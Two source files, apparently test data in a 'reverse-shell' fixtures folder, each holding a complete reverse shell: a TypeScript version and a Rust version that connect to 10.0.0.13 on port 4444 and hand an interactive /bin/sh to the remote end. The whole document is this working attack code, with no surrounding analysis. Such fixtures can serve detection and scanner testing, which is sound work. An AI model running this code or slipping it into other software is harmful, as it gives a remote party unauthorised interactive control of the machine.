File: testdata/reverse-shell/revshell.ts
// TypeScript reverse shell
import * as net from "net";
import { spawn } from "child_process";

const sock: net.Socket = net.connect(4444, "10.0.0.13", (): void => {
    const sh = spawn("/bin/sh", ["-i"]);
    sock.pipe(sh.stdin);
    sh.stdout.pipe(sock);
    sh.stderr.pipe(sock);
});

File: testdata/reverse-shell/revshell.rs
// Rust reverse shell
use std::net::TcpStream;
use std::os::unix::io::{AsRawFd, FromRawFd};
use std::process::{Command, Stdio};

fn main() -> std::io::Result<()> {
    let stream = TcpStream::connect("10.0.0.13:4444")?;
    let fd = stream.as_raw_fd();
    let (stdin, stdout, stderr) = unsafe {
        (
            Stdio::from_raw_fd(libc::dup(fd)),
            Stdio::from_raw_fd(libc::dup(fd)),
            Stdio::from_raw_fd(libc::dup(fd)),
        )
    };
    Command::new("/bin/sh")
        .arg("-i")
        .stdin(stdin)
        .stdout(stdout)
        .stderr(stderr)
        .spawn()?
        .wait()?;
    Ok(())
}
